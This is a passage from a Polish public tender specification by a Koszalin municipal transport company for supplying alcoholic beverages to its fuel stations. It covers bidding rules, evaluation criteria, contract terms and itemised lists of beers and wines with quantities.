6.W przypadku gdyby oferta, oświadczenia lub dokumenty zawierały informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji, Wykonawca powinien w sposób nie budzący wątpliwości zastrzec, które informacje stanowią tajemnicę przedsiębiorstwa. Informacje te powinny być umieszczone w osobnym wewnętrznym opakowaniu, trwale ze sobą połączone i ponumerowane. Nie mogą stanowić tajemnicy przedsiębiorstwa informacje podawane do wiadomości podczas otwarcia ofert, tj. informacje dotyczące ceny, terminu wykonania zamówienia, okresu gwarancji i warunków płatności zawartych w ofercie.
7.Przed upływem terminu składania ofert, Wykonawca może wprowadzić zmiany do złożonej oferty lub wycofać ofertę. Oświadczenia o wprowadzonych zmianach lub wycofaniu oferty powinny być doręczone Zamawiającemu na piśmie pod rygorem nieważności przed upływem terminu składania ofert. Oświadczenia powinny być opakowane tak, jak oferta, a opakowanie powinno zawierać odpowiednio dodatkowe oznaczenie wyrazem: ZMIANA lub WYCOFANIE. 
8.Do wypełnionej czytelnie oferty należy dołączyć wszystkie dokumenty oraz oświadczenia wymienione w punkcie 6 SIWZ; 
9. Oferta powinna być podpisana czytelnym podpisem zawierającym imię i nazwisko umożliwiające identyfikację osoby podpisującej ofertę.

VII. Opis sposobu obliczenia ceny;
Należy podać cenę jednostkową netto przedmiotu zamówienia (w złotych), wartość podatku VAT (w złotych) wartość jednostkową brutto przedmiotu zamówienia (w złotych), wartość brutto zamówienia (w złotych). 
Cena przedstawiona w ofercie musi uwzględniać wszystkie koszty związane z realizacją zamówienia.
VIII. Opis kryteriów, którymi zamawiający będzie się kierował przy wyborze oferty, wraz z podaniem znaczenia tych kryteriów i sposobu oceny ofert; 
1.A.  Cena - 90% (wyliczona dla każdego zadania oddzielnie);
1. B. Termin dostawy 10%
2. TERMIN DOSTAWY B. Ocena kryterium polega na przyznaniu punktów za określony, przez Wykonawcę, termin dostawy napojów alkoholowych tj.:
a)	Termin dostawy - do 3 dni roboczych liczonych od dnia następnego od dnia złożenia zamówienia - 100 punktów;
b)	Termin dostawy - od 4 do 5 dni roboczych liczonych od dnia następnego od dnia złożenia zamówienia - 50 punktów; 
c)	Termin dostawy dłuższy niż 5 dni roboczych liczonych od dnia następnego od dnia złożenia zamówienia - 0 punktów.
3. W celu wyboru najkorzystniejszej oferty Zamawiający będzie posługiwał się następującym wzorem: 
       W=An (kryterium cena) x 90% + B (termin dostawy) x 10%
4.Skala ocen dla poszczególnych ofert zostanie wyliczona, dla każdego zadania oddzielnie, do dwóch miejsc po przecinku.
5.Wartośc podatku VAT należy podać w zaokrągleniu do dwóch miejsc po przecinku, stosując zasadę matematyczną: jeżeli zaokrąglana część jest większa lub równa 0,005 liczba zaokrąglana jest w górę, jeżeli zaokrąglana część jest mniejsza niż 0,005 liczba zaokrąglana jest w dół.
6. Każdy z Wykonawców może zaproponować tylko jedną cenę i nie może jej zmienić.
7. Jeżeli złożono ofertę, której wybór prowadziłby do powstania obowiązku podatkowego zamawiającego zgodnie z przepisami o podatku od towarów i usług w zakresie dotyczącym wewnątrzwspólnotowego nabycia towarów, zamawiający w celu oceny takiej oferty dolicza do przedstawionej w niej cenie podatek od towarów i usług, który miałby obowiązek wpłacić zgodnie z obowiązującymi przepisami.
8. Zamawiający udzieli zamówienia Wykonawcy, który otrzyma łącznie, dla danego zadania,  najwyższą ilość punktów.
IX. Wzajemne rozliczenie; Informacje dotyczące walut obcych, w jakich mogą być prowadzone rozliczenia między Zamawiającym a Wykonawcą, jeżeli Zamawiający przewiduje rozliczenia w walutach obcych;
1.Wynagrodzenie za dostawę będzie rozliczone na podstawie faktury VAT wystawionej przez Wykonawcę po wykonaniu każdej usługi/dostawy i po potwierdzeniu, przez Zamawiającego, że ta usługa/dostawa została wykonana należycie.  
2. Należyte wykonanie usługi/dostawy zostanie potwierdzone na podstawie faktury, wystawionej przez Wykonawcę po każdej dostawie, przez podpisanie jej przez osobę upoważnioną przez Zamawiającego. 
3.Faktura VAT zostanie wystawiona z 30 dniowym terminem płatności. Faktury będą płatne przez Zamawiającego przelewem na rachunek bankowy Wykonawcy.
4.Rozliczenie będzie następować w złotych polskich.
5.Strony wyłączają możność dokonywania przez Wykonawcę potrąceń jakichkolwiek jego należności lub wierzytelności w stosunku do Zamawiającego.
6. Wierzytelności wynikające z niniejszej umowy nie mogą być przedmiotem obrotu bez uzgodnienia między stronami
X. Informacje o formalnościach, jakie powinny zostać dopełnione po wyborze oferty w celu zawarcia umowy w sprawie zamówienia publicznego;
	W terminie określonym w piśmie akceptującym ofertę Wykonawca winien przybyć we wskazane przez Zamawiającego miejsce w celu podpisania umowy, której projekt stanowi załącznik nr 4a do SIWZ dla zadania 1, załącznik nr 4b do SIWZ dla zadania 2 i załącznik nr 4c SIWZ dla zadania 3. Zamawiający dopuszcza podpisanie umowy w siedzibie Wykonawcy, pod warunkiem, że podpisana przez Wykonawcę Umowa, zostanie odesłana do Zamawiającego pocztą kurierską, najpóźniej w terminie 7 dni kalendarzowych liczonych od dnia następnego od dnia otrzymania Umowy od Zamawiającego.

	XI. Wymagania dotyczące zabezpieczenia należytego wykonania umowy;
Zamawiający odstępuje od wniesienia zabezpieczenia należytego wykonania umowy.

XII. Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, ogólne warunki umowy albo wzór umowy, jeżeli Zamawiający wymaga od Wykonawcy, aby zawarł z nim umowę w sprawie zamówienia publicznego na takich warunkach;
1.Wszelkie zobowiązania stron określone są w załączonym do specyfikacji - projekcie umowy (załącznik nr 4a do SIWZ dla zadania 1, załącznik nr 4b do SIWZ dla zadania 2 i załącznik nr 4c SIWZ dla zadania 3). Zamawiający wymaga od Wykonawcy, którego oferta zostanie wybrana, aby zawarł z nim umowę w sprawie zamówienia publicznego na takich warunkach.
2. W przypadku upływu terminu ważności zezwolenia na obrót hurtowy w kraju napojami alkoholowymi, o którym mowa w pkt. 5.1.1 SIWZ w trakcie realizacji umowy, Wykonawca jest zobowiązany do przedstawienia Zamawiającemu nowego zezwolenia, na 60 dni przed upływem terminu obowiązywania poprzedniego zezwolenia. 

XIII. Pouczenie o środkach ochrony prawnej przysługujących Wykonawcy w toku postępowania o udzielenie zamówienia.
1.Środki ochrony prawnej przysługujące Wykonawcy w toku postępowania o udzielenie zamówienia uregulowane są od art. 180 do art. 198 ustawy z dnia 29 stycznia 2004r. - Prawo zamówień publicznych. 
Środki ochrony prawnej przysługują Wykonawcy a także innemu podmiotowi, jeżeli ma lub miał interes w uzyskaniu danego zamówienia oraz poniósł lub może ponieść szkodę w wyniku naruszenia przez Zamawiającego przepisów ustawy PZP. Środki ochrony prawnej wobec ogłoszenia o zamówieniu oraz specyfikacji istotnych warunków zamówienia przysługują również organizacjom wpisanym na listę, o której mowa w art. 154 pkt. 5 PZP.

XIV. Zawarcie umowy ramowej. Maksymalna liczba Wykonawców, z którymi Zamawiający zawrze umowę ramową, jeżeli Zamawiający przewiduje zawarcie umowy ramowej;
Zamawiający nie przewiduje zawarcia umowy ramowej.

XV. Powierzenie wykonania umowy podwykonawcom.  
Zamówienie może być powierzone podwykonawcom. Zamawiający dopuszcza powierzenie podwykonawcom części prac, pod warunkiem wskazania zakresu prac w ofercie (załącznik nr 1a, załącznik nr 1b oraz załącznik nr 1c do SIWZ). Wykonawca będzie ponosił pełną odpowiedzialność wobec Zamawiającego i osób trzecich za usługi wykonane przez podwykonawców. 

XVI. Wspólne ubieganie się o udzielenie zamówienia;
1.Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia (art. 23 ust. 1 PZP).
2.W przypadku, o którym mowa w (art. 23 ust. 1 PZP), Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
3.Przepisy dotyczące Wykonawcy stosuje się odpowiednio do Wykonawców, o których mowa w  (art. 23 ust. 1 PZP).
4.Jeżeli o udzielenie zamówienia ubiegają się wspólnie Wykonawcy, a ich oferta została wybrana, Zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego, umowy regulującej współpracę tych Wykonawców - pod rygorem odstąpienia od zawarcia umowy. 

XVII. Zwrot kosztów. Wysokość zwrotu kosztów udziału w postępowaniu, jeżeli Zamawiający przewiduje ich zwrot; 
Zamawiający nie przewiduje zwrotu kosztów udziału w postępowaniu.

XVIII. Wyjaśnienia dotyczące specyfikacji istotnych warunków zamówienia, jeżeli Zamawiający przewiduje wyjaśnienia
1.Wykonawca może zwrócić się do Zamawiającego o wyjaśnienie treści specyfikacji istotnych warunków zamówienia. Zamawiający jest obowiązany udzielić wyjaśnień niezwłocznie, jednak nie później niż na 2 dni przed upływem terminu składania ofert - jeżeli wartość zamówienia jest mniejsza niż kwoty określone w przepisach wydanych na podstawie art. 11 ust. 8, pod warunkiem że wniosek o wyjaśnienie treści specyfikacji istotnych warunków zamówienia wpłynął do Zamawiającego nie później niż do końca dnia, w którym upływa połowa wyznaczonego terminu składania ofert.
1.2. Jeżeli wniosek o wyjaśnienie treści specyfikacji istotnych warunków zamówienia wpłynął po upływie terminu składania wniosku, o którym mowa w art. 38 ust. 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych, lub dotyczy udzielonych wyjaśnień, Zamawiający może udzielić wyjaśnień albo pozostawić wniosek bez rozpoznania.
1.3.Przedłużenie terminu składania ofert nie wpływa na bieg terminu składania wniosku, o którym mowa w art. 38 ust. 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych.
2.W uzasadnionych przypadkach Zamawiający może przed upływem terminu składania ofert zmienić treść specyfikacji istotnych warunków zamówienia. Dokonaną zmianę specyfikacji Zamawiający przekazuje niezwłocznie wszystkim wykonawcom, którym przekazano specyfikację istotnych warunków zamówienia, a jeżeli specyfikacja jest udostępniona na stronie internetowej, zamieszcza ją także na tej stronie.
3.Jeżeli w postępowaniu prowadzonym w trybie przetargu nieograniczonego zmiana treści specyfikacji istotnych warunków zamówienia prowadzi do zmiany treści ogłoszenia o zamówieniu, Zamawiający zamieszcza ogłoszenie o zmianie ogłoszenia w Biuletynie Zamówień Publicznych - jeżeli wartość zamówienia jest mniejsza niż kwoty określone w przepisach wydanych na podstawie art. 11 ust.8 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych.
4. Jeżeli zmiana, o której mowa w art.12a ust.1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych, jest istotna, w szczególności dotyczy określenia przedmiotu, wielkości lub zakresu zamówienia, kryterium oceny ofert, warunków udziału w postępowaniu lub sposobu oceny ich spełnienia, zamawiający przedłuża termin składania wniosków o dopuszczenie do udziału w postępowaniu lub termin składania ofert o czas niezbędny na wprowadzenie zmian we wnioskach lub ofertach, z tym, że w postępowaniach, których wartość jest równa lub przekracza kwoty określone w przepisach wydanych na podstawie art. 11 ust. 8, termin składania:
a) ofert nie może być krótszy niż 22 dni od dnia przekazania zmiany ogłoszenia Urzędowi Oficjalnych Wspólnot Europejskich - trybie przetargu nieograniczonego;
b) wniosków o dopuszczenie do udziału w postępowaniu nie może być krótszy niż 30 dni, a jeżeli zachodzi pilna potrzeba udzielenia zamówienia niż 10 dni od dnia przekazania zmiany ogłoszenia Urzędowi Oficjalnych Publikacji Wspólnot Europejskich - w trybie przetargu ograniczonego lub negocjacji z ogłoszeniem.
5.Zamawiający niezwłocznie po zamieszczeniu zmiany treści ogłoszenia o zamówieniu w Biuletynie Zamówień publicznych lub jej przekazaniu Urzędowi Oficjalnych Publikacji Wspólnot Europejskich zamieszcza informacje o zmianach w swojej siedzibie oraz na stronie internetowej.
6. Jeżeli w wyniku zmiany treści specyfikacji istotnych warunków zamówienia nieprowadzącej do zmiany treści ogłoszenia o zamówieniu jest niezbędny dodatkowy czas na wprowadzenie zmian w ofertach, Zamawiający przedłuża termin składania ofert i informuje o tym Wykonawców, którym przekazano specyfikację istotnych warunków zamówienia, oraz zamieszcza informację na stronie internetowej, jeżeli specyfikacja istotnych warunków zamówienia jest udostępniona na tej stronie.  Przepis art. 38 ust. 4a ustawy dnia 29 stycznia 2004 r. Prawo zamówień publicznych, stosuje się odpowiednio.
XIX. Informacje o zamiarze ustanowienia dynamicznego systemu zakupów wraz z adresem strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów.
Zamawiający nie przewiduje ustanowienia dynamicznego systemu zakupów.
XX. Zaliczka
Zamawiający nie przewiduje udzielania zaliczek na poczet wykonania zamówienia.
XXI. Do specyfikacji istotnych warunków zamówienia załączony jest wzór oferty załącznik nr 1a do SIWZ dla zadania 1, załącznik nr 1b do SIWZ dla zadania 2, załącznik nr 1c do SIWZ dla zadania 3; wzór oświadczenia (załącznik nr 2 do SIWZ), oświadczenie o przynależności do grupy kapitałowej (załącznik nr 3), projekt umowy: załącznik nr 4a do SIWZ dla zadania 1, załącznik nr 4b do SIWZ dla zadania 2, załącznik nr 4c do SIWZ dla zadania 3, które stanowią integralną część specyfikacji. Zamawiający wymaga, by umowa była zawarta na warunkach określonych w projekcie umowy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Sprzedaż i dostawa napojów alkoholowych do stacji paliw Miejskiego Zakładu Komunikacji Spółka z o.o. w Koszalinie - zadanie 1 piwo..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.	Nazwa przedmiotu zamówienia;	Ilość 
zapotrzebowania 
1.	Piwo jasne alk.5,2% w zawartości: woda,słód jęczmienny, chmiel, pasteryzowane, o pojemności 0,5l butelka szklana; typu BROK EXPORT lub równoważne;	1900 szt.;
2.	Piwo jasne alk.5,2% w zawartości: woda,słód jęczmienny, chmiel, pasteryzowane, o pojemności 0,5l puszka aluminiowa; typu BROK EXPORT lub równoważne;	1200 szt.;
3.	Piwo jasne alk. 6,0%, w zawartości: słód jęczmienny, pasteryzowane o pojemności 0,5l butelka szklana; typu BROK SAMBOR lub równoważne;	900 szt.;
4.	Piwo jasne alk. 6,0%, w zawartości: słód jęczmienny, pasteryzowane o pojemności 0,5l puszka aluminiowa; typu BROK SAMBOR lub równoważne;	1800 szt.;
5.	Piwo jasne alk. 7,0% , w zawartości słód jęczmienny, pasteryzowane, o pojemności 0,5l butelka szklana; typu BROK STRONG lub równoważne;	100 szt.;
6.	Piwo jasne alk. 7,0% , w zawartości słód jęczmienny, pasteryzowane, o pojemności 0,5l puszka aluminiowa; typu BROK STRONG lub równoważne;	2200 szt.;
7.	Piwo jasne alk. 6% w zawartości: słód jęczmienny, pasteryzowane, o pojemności 0,5l butelka szklana; typu KSIĄŻ lub równoważne;	100 szt.;
8.	Piwo jasne alk. 6% w zawartości: słód jęczmienny, pasteryzowane, o pojemności 0,5l puszka aluminiowa; typu KSIĄŻ lub równoważne;	280 szt.;
9.	Piwo aromatyzowane alk.6% w zawartości: woda, słód jęczmienny, kukurydza, syrop, chmiel, aromat, kwas cytrynowy, pasteryzowane o pojemności 0,58l butelka szklana; typu DESPERADOS lub równoważne;	100 szt.;
10.	Piwo aromatyzowane alk.6% w zawartości: woda, słód jęczmienny, kukurydza, syrop, chmiel, aromat, kwas cytrynowy, pasteryzowane o pojemności 0,4l butelka szklana; typu DESPERADOS lub równoważne;	550 szt.;
11.	Piwo jasne wag.14,5%, alk. 7% w zawartości: słód jęczmienny, pasteryzowane o pojemności 0,5l butelka szklana; typu DĘBOWE MOCNE lub równoważne;	250 szt.;
12.	Piwo jasne wag.14,5%, alk. 7% w zawartości: słód jęczmienny, pasteryzowane o pojemności 0,5l puszka aluminiowa; typu DĘBOWE MOCNE lub równoważne;	550 szt.;
13.	Piwo z zaprawą o smaku imbirowym, alk.4,1% w zawartości: słód jęczmienny, cukier, syrop, kwas mlekowy,  aromaty, pasteryzowane o pojemności 0,5l butelka szklana; typu GINGERS lub równoważne;	80 szt.;
14.	Piwo z zaprawą o smaku imbirowym, alk.4,1% w zawartości: słód jęczmienny, cukier, syrop, kwas mlekowy,  aromaty, pasteryzowane o pojemności 0,5l puszka aluminiowa; typu GINGERS lub równoważne;	80 szt.;
15.	Piwo jasne alk. 6% w zawartości: słody jęczmienne, chmiel, pasteryzowane o pojemności 0,5l w butelce szklanej; typu HARNAŚ lub równoważne;	1300 szt.;
16.	Piwo jasne alk. 6% w zawartości: słody jęczmienne, chmiel, pasteryzowane o pojemności 0,5l w puszce; typu HARNAŚ lub równoważne;	1100 szt.;
17.	Piwo jasne wag.11,4%, alk.5% w zawartości: woda, słód jęczmienny, chmiel, pasteryzowane o pojemności 0,5l w butelce szklanej; typu HEINEKEN lub równoważne;	100 szt.;
18.	Piwo jasne wag.11,4%, alk.5% w zawartości: woda, słód jęczmienny, chmiel, pasteryzowane o pojemności 0,5l puszka aluminiowa; typu HEINEKEN lub równoważne;	50 szt.;
19.	Piwo jasne,alk.4% w zawartości: słód jęczmienny, pasteryzowane, o pojemności 0,5l puszka aluminiowa; typu KARPACKIE PILS lub równoważne;	200 szt.;
20.	Piwo jasne alk.0,5% w zawartości: słód jęczmienny, pasteryzowane o pojemności 0,33l w butelce szklanej; typu LECH FREE lub równoważne;	100 szt.;
21.	Piwo jasne wag.11,1%, alk.5,2% w zawartości: słód jęczmienny, pasteryzowane, o pojemności 0,5l butelka szklana; typu LECH PREMIUM lub równoważne;	1000 szt.;
22.	Piwo jasne wag.11,1%, alk.5,2% w zawartości: słód jęczmienny, pasteryzowane, o pojemności 0,5l puszka aluminiowa, typu LECH PREMIUM lub równoważne;	1400 szt.;
23.	Piwo z zaprawą ,alk. 4,5% w zawartości: słód jęczmienny, zaprawa, cukier, kwas mlekowy, pasteryzowane, o pojemności 0,4l butelka szklana; typu REDD,S lub równoważne;	130 szt.;
24.	Piwo z zaprawą ,alk. 4,5% w zawartości: słód jęczmienny, zaprawa, cukier, kwas mlekowy, pasteryzowane, o pojemności 0,5l puszka aluminiowa; typu REDD,S lub równoważne;	200 szt.;
25.	Piwo jasne,alk.7% w zawartości: słód jęczmienny, jęczmień, pasteryzowane, o pojemności 0,5l butelka szklana; typu TATRA MOCNE lub równoważne;	130 szt.;
26.	Piwo jasne,alk.7% w zawartości: słód jęczmienny, jęczmień, pasteryzowane, o pojemności 0,5l puszka aluminiowa; typu TATRA MOCNE lub równoważne;	100 szt.;
27.	Piwo alk.6% w zawartości: słód jęczmienny, jęczmień, pasteryzowane, o pojemności 0,5l butelka szklana; typu TATRA JASNE PEŁNE lub równoważne;	1000 szt.;
28.	Piwo alk.6% w zawartości: słód jęczmienny, jęczmień, pasteryzowane, o pojemności 0,5l puszka aluminiowa; typu TATRA JASNE PEŁNE lub równoważne;	600 szt.;
29.	Piwo jasne wag. 11,7%, alk.5,6% w zawartości: słód jęczmienny, pasteryzowane o pojemności 0,33l butelka szklana; typu TYSKIE lub równoważne;	30 szt.;
30.	Piwo jasne wag. 11,7%, alk.5,6% w zawartości: słód jęczmienny, pasteryzowane o pojemności 0,5l butelka szklana; typu TYSKIE lub równoważne;	2200 szt.;
31.	Piwo jasne wag. 11,7%, alk.5,6% w zawartości: słód jęczmienny, pasteryzowane o pojemności 0,5l puszka aluminiowa; typu TYSKIE lub równoważne;	3500 szt.;
32.	Piwo jasne alk. 5,7% w zawartości słód jęczmienny, jęczmień, pasteryzowane o pojemności 0,5l butelka szklana; typu WARKA  JASNE lub równoważne;	900 szt.;
33.	Piwo jasne alk. 5,7% w zawartości słód jęczmienny, jęczmień, pasteryzowane o pojemności 0,5l puszka aluminiowa; typu WARKA  JASNE lub równoważne;	1400 szt.;
34.	Piwo jasne alk. 6,5% w zawartości: słód jęczmienny, jęczmień, pasteryzowane o pojemności 0,5l butelka szklana; typu WARKA STRONG lub równoważne;	600 szt.;
35.	Piwo jasne alk. 6,5% w zawartości: słód jęczmienny, jęczmień, pasteryzowane o pojemności 0,5l puszka aluminiowa; typu WARKA STRONG lub równoważne;	600 szt.;
36.	Piwo jasne, alk. 6% w zawartości: słód jęczmienny, pasteryzowane o pojemności 0,5l butelka szklana; typu WOJAK JASNY PEŁNY lub równoważne;	100 szt.;
37.	Piwo jasne, alk. 6% w zawartości: słód jęczmienny, pasteryzowane o pojemności 0,5l puszka aluminiowa; typu WOJAK JASNY PEŁNY lub równoważne;	100 szt.;
38.	Piwo jasne wag.12%, alk.6% w zawartości: słód jęczmienny, pasteryzowane o pojemności 0,5l butelka szklana; typu ŻUBR lub równoważne;	2600 szt.;
39.	Piwo jasne wag.12%, alk.6% w zawartości: słód jęczmienny, pasteryzowane o pojemności 0,5l puszka aluminiowa; typu ŻUBR lub równoważne;	3300 szt.;
40.	Piwo jasne wag.12,5%,alk.5,6% w zawartości: woda, słód jęczmienny, chmiel ,pasteryzowane o pojemności 0,5l butelka szklana; typu ŻYWIEC lub równoważne;	700 szt.;
41.	Piwo jasne wag.12,5%, alk.5,6% w zawartości: woda, słód jęczmienny, chmile, pasteryzowane o pojemności 0,5l puszka; typu Żywiec lub równoważne;	1100 szt.;
42.	Piwo jasne alk.5,7% w zawartości: słód jęczmienny, niepasteryzowane o pojemności 0,5l butelka szklana; typu KASZTELAN lub równoważne;	500 szt.;
43.	Piwo jasne alk.5,7% w zawartości: słód jęczmienny, niepasteryzowane o pojemności 0,5l puszka aluminiowa; typu KASZTELAN lub równoważne;	650 szt.;
44.	Piwo z zaprawą lemoniadową , alk. 2,6% w zawartości: słód jęczmienny, substancje słodzące, woda, aromaty, kwas cytrynowy, pasteryzowane o pojemności 0,4l butelka szklana; typu LECH SHANDY lub równoważne;	100 szt.;
45.	Piwo z zaprawą lemoniadową , alk. 2,6% w zawartości: słód jęczmienny, substancje słodzące, woda, aromaty, kwas cytrynowy, pasteryzowane o pojemności 0,4l puszka aluminiowa; typu LECH SHANDY lub równoważne;	100 szt.;
46.	Piwo z lemoniadą cytrusową w zawartości: woda, piwo jasne, guma arabska, kwas cytrynowy, ekstrakt trawy cytrynowej o pojemności 0,5l  butelka szklana; typu WARKA  RADLER lub równoważne;	60 szt.;
47.	Piwo z lemoniadą cytrusową w zawartości: woda, piwo jasne, guma arabska, kwas cytrynowy, ekstrakt trawy cytrynowej o pojemności 0,5l  puszka aluminiowa; typu WARKA  RADLER lub równoważne;	80 szt.;
48.	Piwo o smaku jabłkowym, alk.4,5%  w zawartości: woda, piwo jasne, syrop cukrowy, sok jabłkowy, kwas cytynowy o pojemności 0,5l  puszka aluminiowa; typu SOMERSBY lub równoważne;	340 szt.;
49.	Piwo o smaku jabłkowym, alk.4,5%  w zawartości: woda, piwo jasne, syrop cukrowy, sok jabłkowy, kwas cytynowy o pojemności 0,4l  butelka szklana; typu SOMERSBY lub równoważne;	340 szt.;
50.	Piwo ciemne karmelowe, bezalkoholowe, alk do 0,5 % obj.,w zawartości: woda,chmiel, syrop glukozowo-fruktozowy, słód jęczmienny o pojemności 0,4l, butelka szklana typu KARMI lub równoważne;	60 szt.;
51.	Piwo z lemoniadą , alk. 2% w zawartości: woda,sok z cytryny, sok z limonki, syrop glukozowo- fruktozowy,słód jęczmienny,pasteryzowane o pojemności 0,5l butelka szklana; typu OKOCIM RADLER lub równoważne;	150 szt.;
52.	Piwo z lemoniadą , alk. 2% w zawartości: woda,sok z cytryny, sok z limonki, syrop glukozowo- fruktozowy,słód jęczmienny,pasteryzowane o pojemności 0,5l puszka aluminiowa; typu OKOCIM RADLER lub równoważne;	200 szt.;
53.	Piwo jasne , alk.5,6% w zawartości: słód jęczmienny, pasteryzowane o pojemności 0,5l puszka aluminiowa; typu OKOCIM PILS lub równoważne;	100 szt.;
54.	Piwo jasne alk.5,6% w zawartości: słód jęczmienny, pasteryzowane o pojemności 0,5l butelka szklanka; typu OKOCIM PILS lub równoważne;	100 szt.;
55.	Piwo jasne, alk.5,0% w zawartości: słód jęczmienny, pasteryzowane o pojemności 0,5l butelka szklana; typu CARLSBERG lub równoważne;	100 szt.;
56.	Piwo jasne, alk.5,0% w zawartości: słód jęczmienny, pasteryzowane o pojemności 0,5l puszka aluminiowa; typu CARLSBERG lub równoważne;	60 szt.;
57.	Piwo jasne, alk.7,0% w zawartości: słód jęczmienny, pasteryzowane o pojemności 0,5l butelka szklana; typu OKOCIM MOCNE lub równoważne;	80 szt.;
58.	Piwo jasne, alk.7,0% w zawartości: słód jęczmienny, pasteryzowane o pojemności 0,5l puszka aluminiowa; typu OKOCIM MOCNE lub równoważne;	60 szt.;
59.	Piwo jasne, alk.5,6% w zawartości: słód jęczmienny, pasteryzowane o pojemności 0,5l butelka szklana; typu PERŁA EXPORT lub równoważne;	430 szt.;
60.	Piwo jasne, alk.6,0% w zawartości: słód jęczmienny, pasteryzowane o pojemności 0,5l butelka szklana; typu PERŁA CHMIELOWA lub równoważne;	430 szt.;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.96.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 02.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin dostawy - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Sprzedaż i dostawa napojów alkoholowych do stacji paliw Miejskiego Zakładu Komunikacji Spółka z o.o. w Koszalinie - zadanie 2 - wino..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.	Nazwa przedmiotu zamówienia	Ilość 
zapotrzebowania;
 1.	Wino gronowe białe, słodkie. musujące o zawartości alkoholu  10%  ( butelka szklana) o pojemności 0,75 l; typu IGRISTOJE lub równoważne;	30 szt.;
2.	Wino Kalifornijskie czerwone gronowe, o zawartości alkoholu  9,5%  ( butelka szklana) o pojemności 0,75 l; typu  CARLO ROSSI CALIFORNIA RED lub równoważne;	10 szt.;
3.	Wino Kalifornijskie różowe gronowe, o zawartości alkoholu  9,5%  ( butelka szklana) o pojemności 0,75 l; typu  CARLO ROSSI CALIFORNIA ROSE lub równoważne;	10 szt.;
4.	Wino białe gronowe o zawartości alkoholu  9,5%  ( butelka szklana) o pojemności 0,75 l; typu  CARLO ROSSI CALIFORNIA WHITE lub równoważne;	6 szt.;
5.	Wino czerwone  węgierskie półwytrawne zawartości alkoholu  11,5 %  ( butelka szklana) o pojemności 1 l; typu   EGRI BIKAVER PÓŁWYTRWANE  lub równoważne;	6 szt.;
6.	Wino czerwone  węgierskie wytrawne o zawartości alkoholu 11,5 %  ( butelka szklana) o pojemności 1 l; typu   EGRI BIKAVER RED  lub równoważne;	6 szt.;
7.	Wino lekko wytrawne , łagodny bukiet nuty leśnych owoców z subtelnym zapachem dymu. o zawartości alkoholu 12 %  ( butelka szklana) o pojemności 0,75 l; typu   JULIA RED  lub równoważne;	6 szt.;
8.	Wino lekko wytrawny i łagodny bukiet o aromacie truskawek i arbuzów, Włoskie, różowe wino o zawartości alkoholu  12 %  ( butelka szklana) o pojemności 0,75 l; typu   JULIA ZINFANDEL ROSE  lub równoważne;	10 szt.;
9.	Wino czerwone, półsłodkie, o delikatnym smaku i aromacie, delikatna słodycz pochodzi ze zbioru tylko dojrzałych winogrono zawartości alkoholu 11 %  ( butelka szklana) o pojemności 0,75 l; typu   KADARKA   EXCLUSIVE lub równoważne;	30 szt.;
10.	Wino  o posmaku dojrzałej ciemnej czereśni, czekolady, kawy i rodzynek o zawartości alkoholu  16 %  ( butelka szklana) o pojemności 0,75 l; typu  KAGOR  Wino Czerwone Słodkie lub równoważne;	6 szt.;
11.	Wino,  delikatny vermouth na bazie białego włoskiego wina z dodatkiem ziół, wanilii,  zawartości alkoholu 15 %  (butelka szklana) o pojemności 0,75 l; typu  MARTINI BIANCO  lub równoważne;	6 szt.;
12.	Wino delikatny vermouth na bazie białego włoskiego wina z dodatkiem ziół, wanilii o zawartości alkoholu  15 %  ( butelka szklana) o pojemności 1 l; typu  MARTINI BIANCO  Wino Czerwone Słodkie lub równoważne;	6 szt.;
13.	Wino o delikatnym aromacie z akcentami orzeźwiających cytrusów oraz smakiem czarnego bzu i brzoskwini o zawartości alkoholu  15 %  ( butelka szklana) o pojemności 0,5 l; typu  MARTINI ROSE  Wino Czerwone Słodkie lub równoważne;	6 szt.;
14.	Wino o delikatnym aromacie z akcentami orzeźwiających cytrusów oraz smakiem czarnego bzu i brzoskwini o zawartości alkoholu 15 %  ( butelka szklana) o pojemności 1 l; typu  MARTINI ROSE  Wino Czerwone Słodkie lub równoważne;	6 szt.;
15.	Wino o ziołowej nucie oraz charakterystycznej  ciemnej  barwie, o zawartości alkoholu  15 %  ( butelka szklana) o pojemności 0,5 l; typu  MARTINI ROSSO   lub równoważne;	6 szt.;
16.	Wino o  ziołowej nucie oraz charakterystycznej  ciemnej  barwie ,  o zawartości alkoholu 15 %  ( butelka szklana) o pojemności 1 l; typu  MARTINI ROSSO  lub równoważne;	6 szt.;
17.	Wino o zawartości alkoholu 11 %  ( butelka szklana) o pojemności 0,75 l; typu  SOPHIA  SEMI DRY OLD MIELNIK   lub równoważne;	20 szt.;
